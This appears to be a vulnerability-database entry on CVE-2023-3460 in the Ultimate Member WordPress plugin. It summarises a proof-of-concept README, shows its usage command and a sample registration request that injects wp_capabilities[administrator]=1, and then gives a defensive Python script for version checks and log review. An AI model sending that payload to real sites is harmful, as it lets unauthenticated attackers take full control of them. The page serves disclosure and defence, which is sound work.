WordPress Ultimate Member Privilege Escalation Vulnerability

Vulnerability Information

Vulnerability name: WordPress Ultimate Member Privilege Escalation Vulnerability

Vulnerability ID:

  • CVE: CVE-2023-3460

Vulnerability type: Privilege escalation

Severity: Critical

Vulnerability description: The WordPress Ultimate Member plugin is a popular user membership management plugin, widely deployed on WordPress sites to handle user registration, login, user profiles and related features. Versions 2.6.6 and earlier contain a critical privilege escalation vulnerability (CVE-2023-3460) that allows an unauthenticated attacker to elevate an ordinary user account to administrator by crafting a malicious registration request. The technical root cause is that the plugin fails to properly validate and filter user-submitted data when processing registration requests, in particular its insufficient checking of the wp_capabilities parameter, so an attacker can bypass the normal permission controls and grant themselves the administrator role directly. The impact is extremely severe: no authentication is needed, and a successful attacker gains full control of the affected WordPress site, including publishing malicious content, stealing sensitive data, and potentially pivoting to attack the underlying server. Because the vulnerability is easy to exploit and widely exposed, every WordPress site running Ultimate Member below version 2.6.7 should upgrade to the latest version immediately to avoid the risk.

Vendor: Ultimate Member

Product: WordPress Ultimate Member Plugin

Affected versions: ≤ 2.6.6

Source: https://github.com/GURJOTEXPERT/CVE-2023-3460

Type: CVE-2023:github search

Repository files

  • CVE-2023-3460.py
  • README.md

Source overview

🚨 CVE-2023-3460 - WordPress Ultimate Member Privilege Escalation Exploit

This is a proof-of-concept (PoC) exploit for CVE-2023-3460, a critical vulnerability in the WordPress plugin Ultimate Member. It allows unauthenticated users to escalate their privileges to Administrator by crafting a malicious registration request.

🔥 Impact: Full site compromise through unauthorized admin account creation.


📌 Vulnerability Details

  • Plugin Affected: Ultimate Member
  • Affected Versions: ≤ 2.6.6
  • Fixed Version: 2.6.7
  • Exploit Type: Privilege Escalation via Registration Abuse
  • Authentication Required: ❌ No
  • CVE: CVE-2023-3460

⚙️ Requirements

  • Python 3
  • requests library

Install requirements:

pip3 install requests

🧪 Exploit Usage

python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> -e <EMAIL>

✅ Example:

python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 -e pwn@evil.com

📥 Exploit Script Features

  • Fetches CSRF nonce (_wpnonce) from the register page
  • Bypasses form validation
  • Injects wp_capabilities with administrator role
  • Creates a new admin user without authentication

🔐 Sample Exploit Payload

POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
user_email=pwn@evil.com&
user_password=Pass@123&
wp_capabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Mitigation

  • Update Ultimate Member plugin to v2.6.7 or above
  • Disable open registration if not required
  • Monitor user creation logs for suspicious activity
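Two of the mitigations above can be turned into routine checks. The following Python script is an added example (not code from the PoC repository or from the plugin vendor): it decides from a plugin readme.txt whether an installed Ultimate Member copy is still in the affected range (below the fixed release 2.6.7), and it reviews user-creation audit events for accounts that obtained the administrator role at registration time or whose registration form carried a capability or role field such as the wp_capabilities parameter named in the advisory. The readme excerpt and the JSON-lines audit events are constructed sample input, and the event schema is an assumption rather than the export format of any particular logging plugin.

```python
"""Defender-side checks for CVE-2023-3460 (Ultimate Member <= 2.6.6).

Added example, not code from the PoC repository or the plugin vendor.
It covers two mitigations: confirming whether an installed copy of the
plugin is still in the affected range, and reviewing user-creation
events for accounts that obtained a privileged role, or submitted
capability/role fields, at registration time. The readme excerpt and
the audit events are constructed sample input; the event schema is an
assumption, not the format of any particular plugin.
"""
import json
import re

FIXED_VERSION = (2, 6, 7)          # fixed release named in the advisory
PRIVILEGED_ROLES = {"administrator"}
# Form field names that a self-registration has no business carrying.
# "wp_capabilities" is the parameter named in the advisory; the pattern also
# catches a non-default table prefix (the meta key is <prefix>capabilities)
# and a bare "role" field.
SUSPICIOUS_FIELD = re.compile(r"capabilities|user_level|^role$", re.IGNORECASE)


def parse_version(tag: str) -> tuple:
    """'2.6.6' -> (2, 6, 6); stops at the first non-numeric component."""
    parts = []
    for piece in tag.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def stable_tag_from_readme(readme_text: str):
    """Return the 'Stable tag:' value from a plugin readme.txt, or None."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_text, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def is_vulnerable_version(tag: str) -> bool:
    """True when the installed version is below the fixed release 2.6.7."""
    v = parse_version(tag)
    return bool(v) and v < FIXED_VERSION


def review_registration_events(jsonl: str) -> list:
    """Flag 'user_registered' events that look like capability injection."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("event") != "user_registered":
            continue
        reasons = []
        if PRIVILEGED_ROLES & set(ev.get("roles", [])):
            reasons.append("privileged role assigned at registration")
        odd = [f for f in ev.get("submitted_fields", []) if SUSPICIOUS_FIELD.search(f)]
        if odd:
            reasons.append("registration form carried " + ", ".join(odd))
        if reasons:
            findings.append({"user": ev.get("user"), "time": ev.get("time"),
                             "reasons": reasons})
    return findings


# Constructed readme excerpt for a still-vulnerable install.
SAMPLE_README = "=== Ultimate Member ===\nStable tag: 2.6.6\nLicense: GPLv2\n"

# Constructed user-creation audit events (JSON lines): one benign signup,
# one registration carrying the capability field, one unrelated login.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"time": "2025-07-22T10:01:02Z", "event": "user_registered", "user": "alice",
     "roles": ["subscriber"],
     "submitted_fields": ["user_login", "user_email", "user_password"]},
    {"time": "2025-07-22T10:05:41Z", "event": "user_registered", "user": "pwnadmin",
     "roles": ["administrator"],
     "submitted_fields": ["user_login", "user_email", "user_password",
                          "wp_capabilities[administrator]"]},
    {"time": "2025-07-22T10:06:00Z", "event": "user_login", "user": "pwnadmin",
     "roles": ["administrator"], "submitted_fields": []},
])

if __name__ == "__main__":
    tag = stable_tag_from_readme(SAMPLE_README)
    state = "VULNERABLE" if is_vulnerable_version(tag) else "patched"
    print(f"Ultimate Member {tag}: {state}")
    for f in review_registration_events(SAMPLE_EVENTS):
        print(f"{f['time']} user={f['user']}: {'; '.join(f['reasons'])}")
```

The version check reads the same "Stable tag" line that WordPress itself uses for plugin metadata, so it can be run against a filesystem inventory without touching the live site. The event review is deliberately conservative: a self-registered account landing in the administrator role is flagged on its own, and so is any registration request that carried a capability or role field, even if the role ended up as subscriber, since on a patched site those fields should simply never appear in a front-end registration.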

📚 References


⚠️ Disclaimer

This script is provided for educational and authorized testing purposes only. Unauthorized exploitation of systems is illegal and unethical. Use it only on systems you own or have permission to test.


👨‍💻 Author


http://example.com/2025/07/22/github_1632551176/
Author: lianccc
Published: July 22, 2025